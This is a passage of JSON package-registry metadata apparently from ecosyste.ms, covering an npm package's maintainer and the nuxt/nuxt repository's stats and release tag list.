/api/v1/hosts/GitHub/authors/wattanx"},{"login":"productdevbook","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"antfu","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"HugoRCD","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"kikudesuyo","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kikudesuyo"},{"login":"ineshbose","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"Hebilicious","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"dargmuesli","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@rsnuxt%2Futils/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@rsnuxt%2Futils/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@rsnuxt%2Futils/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@rsnuxt%2Futils/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@rsnuxt%2Futils/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@rsnuxt%2Futils/codemeta","maintainers":[{"uuid":"vincent.bian","login":"vincent.bian","name":null,"email":"macisi528@gmail.com","url":null,"packages_count":74,"html_url":"https://www.npmjs.com/~vincent.bian","role":null,"created_at":"2025-02-11T09:15:31.307Z","updated_at":"2025-02-11T09:15:31.307Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/vincent.bian/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5608775,"maintainers_count":1189233,"namespaces_count":373614,"keywords_count":0,"github":"npm","metadata":{"funded_packages_count":166557},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-04-03T05:46:01.652Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":1096148,"name":"@nuxt/vue-app-edge","ecosystem":"npm","description":null,"homepage":"https://github.com/nuxt/nuxt#readme","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/nuxt/nuxt","keywords_array":[],"namespace":"nuxt","versions_count":1781,"first_release_published_at":"2018-10-30T20:47:10.481Z","latest_release_published_at":"2020-06-29T00:23:15.415Z","latest_release_number":"3.0.0-26556502.75dd90f2","last_synced_at":"2026-05-11T01:23:19.782Z","created_at":"2022-04-08T10:39:37.977Z","updated_at":"2026-05-11T01:23:19.783Z","registry_url":"https://www.npmjs.com/package/@nuxt/vue-app-edge","install_command":"npm install @nuxt/vue-app-edge","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"next":"3.0.0-26556502.75dd90f2","latest":"2.18.2-28661769.e265ef3"}},"repo_metadata":{"id":37288797,"uuid":"71995937","full_name":"nuxt/nuxt","owner":"nuxt","description":"The Intuitive Vue Framework.","archived":false,"fork":false,"pushed_at":"2024-10-29T20:55:49.000Z","size":114898,"stargazers_count":54703,"open_issues_count":872,"forks_count":5004,"subscribers_count":793,"default_branch":"main","last_synced_at":"2024-10-29T21:25:05.500Z","etag":null,"topics":["csr","framework","full-stack","hacktoberfest","hybrid","node","nuxt","server-rendering","ssg","ssr","static-site-generator","universal","vue"],"latest_commit_sha":null,"homepage":"https://nuxt.com","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/nuxt.png","metadata":{"files":{"readme":"README.md","changelog":"changelog.config.json","contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null},"funding":{"github":["nuxt"],"open_collective":"nuxtjs"}},"created_at":"2016-10-26T11:18:47.000Z","updated_at":"2024-10-29T18:14:58.000Z","dependencies_parsed_at":"2023-12-19T04:00:01.692Z","dependency_job_id":null,"html_url":"https://github.com/nuxt/nuxt","commit_stats":{"total_commits":5138,"total_committers":630,"mean_commits":8.155555555555555,"dds":0.6897625535227715,"last_synced_commit":"800902df129a13e0da40b04b3a09e0d1a9852820"},"previous_names":["nuxt/nuxt.js"],"tags_count":223,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":222121833,"owners_count":16934971,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"nuxt","name":"Nuxt","uuid":"23360933","kind":"organization","description":"The Intuitive Vue Framework","email":null,"website":"https://nuxt.com","location":"Global","twitter":"nuxt_js","company":null,"icon_url":"https://avatars.githubusercontent.com/u/23360933?v=4","repositories_count":61,"last_synced_at":"2024-05-20T15:02:00.816Z","metadata":{"has_sponsors_listing":true},"html_url":"https://github.com/nuxt","funding_links":["https://github.com/sponsors/nuxt"],"total_stars":99051,"followers":3259,"following":0,"created_at":"2022-11-02T16:30:40.909Z","updated_at":"2024-05-20T15:02:03.446Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt/repositories"},"tags":[{"name":"v3.11.1","sha":"a80d1a0d6349bf1003666fc79a513c0d7370c931","kind":"commit","published_at":"2024-03-18T21:33:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.1/manifests"},{"name":"v3.11.0","sha":"78d5098c28d2e21622961d8b87ef9b4623194fec","kind":"commit","published_at":"2024-03-17T08:15:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.0/manifests"},{"name":"v3.10.3","sha":"aaad9924339b4c45d7feb45ed84bac4052edfcf0","kind":"commit","published_at":"2024-02-22T13:56:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.3/manifests"},{"name":"v3.10.2","sha":"ceebcde36642fd3711a2567658cb1337a0475153","kind":"commit","published_at":"2024-02-14T13:00:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.2/manifests"},{"name":"v3.10.1","sha":"460e0cfebd0ad19c7928c8d986e59f93a1bba1a3","kind":"commit","published_at":"2024-02-05T16:48:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.1/manifests"},{"name":"v3.10.0","sha":"da3c502f08587f93e1134bc8e7aea1dee8d628fb","kind":"commit","published_at":"2024-01-30T15:25:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.0/manifests"},{"name":"v3.9.3","sha":"fd8b263326c8703815a7e043948c22a8e5b969e2","kind":"commit","published_at":"2024-01-17T14:19:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.3/manifests"},{"name":"v3.9.2","sha":"97ed2df423ebd8038f16d81e00cd2836ba2d712a","kind":"commit","published_at":"2024-01-16T17:00:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.2/manifests"},{"name":"v2.17.3","sha":"4aa989d68a1934bd107fc5ad4e87549d39277ecd","kind":"tag","published_at":"2024-01-12T15:13:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.3/manifests"},{"name":"v3.9.1","sha":"6736decba0dc8bbc7276848a8a26973440ebdee4","kind":"commit","published_at":"2024-01-05T21:55:58.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"c28ef02a1779b1c8a30c3daa2049d3c81a88ac91","kind":"commit","published_at":"2023-12-25T17:24:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.0/manifests"},{"name":"v3.8.2","sha":"8d1fc6c4a9b0f6a662a006489162e66fdeb677b1","kind":"commit","published_at":"2023-11-20T22:22:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.2/manifests"},{"name":"v3.8.1","sha":"d8674b99820d0e4dd620b20d38efb2ee52c80e52","kind":"commit","published_at":"2023-11-06T11:54:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.1/manifests"},{"name":"v2.17.2","sha":"2080d82471962a5a6ea2c7b38c8975c961e919f8","kind":"tag","published_at":"2023-10-24T03:05:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.2/manifests"},{"name":"v3.8.0","sha":"59ff865b133aaf82876f73b2d0566a00081b2795","kind":"commit","published_at":"2023-10-19T15:21:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.0/manifests"},{"name":"v3.7.4","sha":"5abd8a231f26a2e08071a59caa87b80eaaa6cd91","kind":"commit","published_at":"2023-09-26T00:18:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.4/manifests"},{"name":"v3.7.3","sha":"16e40f899e753208dd270c30869d240fbff0b8a2","kind":"commit","published_at":"2023-09-13T22:52:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.3/manifests"},{"name":"v3.7.2","sha":"ebacf199fe52b9dfd5cb48f2f4735df0e9adbaac","kind":"commit","published_at":"2023-09-12T21:35:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.2/manifests"},{"name":"v3.7.1","sha":"88a6d0a499cc7696bff94c02548cd9cc60f7820b","kind":"commit","published_at":"2023-09-05T13:49:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"9013f88e75f499e650463e3c80d116d0ce898a14","kind":"commit","published_at":"2023-08-25T23:26:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.0/manifests"},{"name":"v3.6.5","sha":"f6a3adb52156774ab372829a2ee2533906758288","kind":"commit","published_at":"2023-07-19T17:40:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.5/manifests"},{"name":"v3.6.4","sha":"380a91985c350281aba2d8eb16c65b0ebc39ea8b","kind":"commit","published_at":"2023-07-19T15:19:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.4/manifests"},{"name":"v3.6.3","sha":"f068ad5edda4aaf79906a58ab472c9c3c0f564f1","kind":"commit","published_at":"2023-07-14T22:48:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.3/manifests"},{"name":"v2.17.1","sha":"9de25afa865ca6861a7bb6e3b6b89df56616d93d","kind":"tag","published_at":"2023-07-14T22:35:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.1/manifests"},{"name":"v3.6.2","sha":"88f914e9a01cb8ed196afb653dbcb4f7a5123b15","kind":"commit","published_at":"2023-07-05T21:42:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.2/manifests"},{"name":"v3.6.1","sha":"54a0d5e8dc2184f995169e6b4c5adaba9cffaa6c","kind":"commit","published_at":"2023-06-26T19:25:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.1/manifests"},{"name":"v3.6.0","sha":"e58cfc81f03a2323c95e6671af7deb4c4288bf39","kind":"commit","published_at":"2023-06-23T12:06:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.0/manifests"},{"name":"v2.17.0","sha":"1ce34ec2c438fbad9a04f7eda2ce4f439389ea9a","kind":"tag","published_at":"2023-06-09T20:51:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.0/manifests"},{"name":"v3.5.3","sha":"199595f3afac38b2a41be0a1c5593a8b6ea03366","kind":"commit","published_at":"2023-06-06T00:24:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"d85348987f8fd0e36763de69d6c665b630532429","kind":"commit","published_at":"2023-05-29T11:48:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"f13ccfe8363e3ababea7379d07822953eea555aa","kind":"commit","published_at":"2023-05-21T16:39:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"9683c3dad3fc31d5a2f780f6e7e785c1eeedc797","kind":"commit","published_at":"2023-05-16T13:29:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.0/manifests"},{"name":"v3.4.3","sha":"1464294d6abe13b54fdb8d204732345551c8e647","kind":"commit","published_at":"2023-04-28T19:08:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.3/manifests"},{"name":"v3.4.2","sha":"607bfdcfefe3520c89202fe5a5525794792192d7","kind":"commit","published_at":"2023-04-20T13:51:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.2/manifests"},{"name":"v3.4.1","sha":"940fb0b7ad73960257f3e5f868186c302308e43b","kind":"commit","published_at":"2023-04-13T10:31:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"25e3a9046cc1b3dd9c1bf2c188a627b0a9446ad2","kind":"commit","published_at":"2023-04-11T16:17:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.0/manifests"},{"name":"v3.3.3","sha":"8e9d7157a8d4fae6d2d0ae4598dd7c2ae14e5571","kind":"commit","published_at":"2023-04-02T14:14:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.3/manifests"},{"name":"v3.3.2","sha":"dd6f9c01ccea00ddb37d15ce1773a054b99f08db","kind":"commit","published_at":"2023-03-24T18:31:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.2/manifests"},{"name":"v2.16.3","sha":"6ca842e36ed935950608f02b539fc2985f5f3ef9","kind":"tag","published_at":"2023-03-17T15:39:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.3","mani